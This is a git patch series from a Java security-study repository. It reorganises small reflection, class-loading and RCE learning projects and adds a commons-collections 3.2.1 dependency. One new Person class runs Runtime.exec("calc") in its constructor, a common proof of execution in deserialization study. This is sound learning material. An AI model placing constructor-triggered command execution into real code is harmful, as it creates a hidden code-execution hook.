@@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/date.html b/SSTI/Thymeleaf/src/main/resources/templates/date.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/date.html +++ /dev/null 
@@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/index.html b/SSTI/Thymeleaf/src/main/resources/templates/index.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/index.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file diff --git a/SSTI/Thymeleaf/src/main/resources/templates/page.html b/SSTI/Thymeleaf/src/main/resources/templates/page.html deleted file mode 100644 index 4bdcfcb..0000000 --- a/SSTI/Thymeleaf/src/main/resources/templates/page.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - $Title$ - - -$END$ - - \ No newline at end of file From f534d5f7bd88b2ef803a88507c6f56b7da208d13 Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:56:52 +0800 Subject: [PATCH 09/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0=E5=8F=8D?= =?UTF-8?q?=E5=B0=84=E7=9B=B8=E5=85=B3=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/pojo/Person.java" | 4 --- .../src/main/java/com/test/study/Loader.java" | 17 ----------- .../java/com/test/study/define2Load.java" | 4 --- .../src/main/java/com/test/study/tmp.java" | 4 --- .../src/main/java/com/test/pojo/Student.java" | 4 --- .../java/com/test/study/RuntimeExec.java" | 4 --- .../src/main/java/com/test/study/tmp.java" | 4 --- .../ClassLoadStudy/.gitignore" | 0 .../ClassLoadStudy/.idea/.gitignore" | 0 .../ClassLoadStudy/.idea/encodings.xml" | 0 .../ClassLoadStudy/.idea/misc.xml" | 0 .../ClassLoadStudy/.idea/vcs.xml" | 0 .../ClassLoadStudy/Person.class" | Bin 0 -> 784 bytes .../ClassLoadStudy/Student.class" | Bin 0 -> 881 bytes .../ClassLoadStudy/pom.xml" | 8 ++++++ .../src/main/java/com/test/pojo/Baka.java" | 0 .../src/main/java/com/test/pojo/Person.java" | 18 ++++++++++++ .../src/main/java/com/test/study/Loader.java" | 20 +++++++++++++ .../java/com/test/study/define2Load.java" | 27 ++++++++++++++++++ .../src/main/java/com/test/study/tmp.java" | 7 +++++ .../RceStudy/.gitignore" | 0 .../RceStudy/.idea/encodings.xml" | 0 .../RceStudy/.idea/misc.xml" | 0 .../RceStudy/.idea/vcs.xml" | 0 .../RceStudy/.idea/workspace.xml" | 0 .../RceStudy/pom.xml" | 0 .../src/main/java/com/test/ExecFailed.java" | 0 .../java/com/test/ProcessBuilderExec.java" | 0 .../RceStudy/src/main/webapp/WEB-INF/web.xml" | 0 .../RceStudy/src/main/webapp/index.jsp" | 0 .../src/main/webapp/processBuilder.jsp" | 0 .../RceStudy/src/main/webapp/runtime.jsp" | 0 .../RceStudy/src/main/webapp/runtime2.jsp" | 0 .../ReflectionStudy/.gitignore" | 0 .../ReflectionStudy/.idea/.gitignore" | 0 .../ReflectionStudy/.idea/encodings.xml" | 0 .../ReflectionStudy/.idea/misc.xml" | 0 
.../ReflectionStudy/.idea/vcs.xml" | 0 .../ReflectionStudy/1.txt" | Bin 0 -> 8 bytes .../ReflectionStudy/pom.xml" | 0 .../src/main/java/com/test/pojo/Baka.java" | 2 +- .../main/java/com/test/pojo/Student.class" | Bin 0 -> 881 bytes .../src/main/java/com/test/pojo/Student.java" | 25 ++++++++++++++++ .../com/test/study/Reflection2Runtime.java" | 15 ++++++++-- .../com/test/study/ReflectionMethods.java" | 2 ++ .../java/com/test/study/RuntimeExec.java" | 22 ++++++++++++++ .../main/java/com/test/study/Ways2Class.java" | 0 .../src/main/java/com/test/study/tmp.java" | 16 +++++++++++ 48 files changed, 159 insertions(+), 44 deletions(-) delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" delete mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" => 
"Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" (74%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" (100%) 
create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" (100%) rename 
"Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" => 
"Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" (100%) rename 
"Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" (100%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" (97%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" (65%) rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" => 
"Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" (97%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" rename "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" => "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" deleted file mode 100644 index f603f37..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class Person { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" deleted file mode 100644 index 1ec5f3c..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" +++ /dev/null 
@@ -1,17 +0,0 @@
-package com.test.study;
-
-import com.test.pojo.Baka;
-
-public class Loader {
- public static void main(String[] args) throws Exception {
- Class bakaClass = Baka.class;
- System.out.println("=================");
- Class.forName("com.test.pojo.Baka"); // 触发static
- System.out.println("==================");
- Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发
- System.out.println("=================");
- Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static
- System.out.println("==================");
- Baka baka = Baka.class.newInstance(); // 触发无参构造和static
- }
-}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
deleted file mode 100644
index ef2c366..0000000
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
+++ /dev/null
@@ -1,4 +0,0 @@
-package com.test.study;
-
-public class define2Load {
-}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java"
deleted file mode 100644
index d901a07..0000000
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java"
+++ /dev/null
@@ -1,4 +0,0 @@
-package com.test.study;
-
-public class tmp {
-}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" deleted file mode 100644 index 90ac535..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.pojo; - -public class Student { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" deleted file mode 100644 index c630665..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class RuntimeExec { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" deleted file mode 100644 index d901a07..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class tmp { -} 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" new file mode 100644 index 0000000000000000000000000000000000000000..a4adc653becc3b56a0436e8e4bebe4f75f66e7d1 GIT binary patch literal 784 zcmZuvU2hUW6g>mT>@JH1S`=GtDYX__+x4SwZG17Bn4l%nXnb782`;iTxI1Y5MLySu z)@Y*d{wVeCf)o??;cn)fd+s^&@$=W$?*R6(@1Tg9jcZu8u;So4Za7%QnuU7uU*~9W zY&fuS)50dlEsiaQ{9&L1^ME1SY`tK}J=Cuy!$Lby^4U1-$>`Yc4GAfBjW6Cl^+)MC zRW}%{LouA{ovt27LOu?X?m|aKu~vHn|Gn?xG8Q#3ms5g+p`~!7A#zuy8OnOX2wf#3sCkmA5 znn?QL!Cb^Sn1PRyrXhu`HYdU~E~x_5KS++feBnLa1cTF;X11s{TXV`OOolmmB56xo z|C>7}=tNq`I3_`DzVrA^q(3D0OChihmmW~^Wx$d literal 0 HcmV?d00001 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" new file mode 100644 index 0000000000000000000000000000000000000000..94ba715c97193a50cd3e6ed25bd6504183974d4f GIT binary patch literal 881 zcmZva?N8HC6vm&s&9y5XjIqL;3KK*&5b6uQBoMzCO^8#7TQq*NyStekUGHpf75^eX z>jyBJ=y(4p^|X{R6Vv4O-gC}#e$RdR_50fo0NZ$AU>cVSxQr`077Z++Zs01Gb*#ky zYZ_KHTsKg_nvRB!riOJ58w?q@$H4X&^1H6@s)r2OM)M^@?vd;XhMAV@i|5g>D}s*G z^(azoD~BIGb4JNJX|u|p?{Y8I8*Lc{Ts(2(YO}4Pp77PyzN$Sjei8Y~9g1->2H$6>oB>1SD3{l}p5%uNnlF_YIdl#dmqS~LP}w6nkak+mP&#kD z-yI09{t2}|hDr?S;ABJzt99n?AaH%vR)KJaI}@fS!o(iMMIPC=8mGc!1Eg~O{!V-m zv*+w|TMR~DsPV#TG$)j4n1DHPBsjy`|N2e{4g$$V7?PkmS=o6T$Pe+2lL>l2MS5NU zJr~TNM6(Rd=`v}Yqt!cPDFUplpMZTqrkp)S?kg^o^T*I$eL}JI9fj8$Coq0~CW#3P zRp=zCkZ2JajXHAlI897ZZknUTF-8 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" new file mode 100644 index 0000000..287b878 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" @@ -0,0 +1,18 @@ +package com.test.pojo; + +import java.io.IOException; + +public class Person { + public Person() { + try { + System.out.println("Person non-args constructor"); + Runtime.getRuntime().exec("calc"); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + static { + System.out.println("Person static"); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" new file mode 100644 index 0000000..d901fbe --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" 
@@ -0,0 +1,20 @@
+package com.test.study;
+
+import com.test.pojo.Baka;
+
+public class Loader {
+ public static void main(String[] args) throws Exception {
+ Class bakaClass = Baka.class;
+ System.out.println("=================");
+// Class.forName("com.test.pojo.Baka"); // 触发static
+// System.out.println("==================");
+// Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发
+// System.out.println("=================");
+// Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static
+// System.out.println("==================");
+// ClassLoader classLoader = ClassLoader.getSystemClassLoader();
+// classLoader.loadClass("com.test.pojo.Baka"); // 无事发生
+// System.out.println("==================");
+ Baka baka = Baka.class.newInstance(); // 触发无参构造和static
+ }
+}
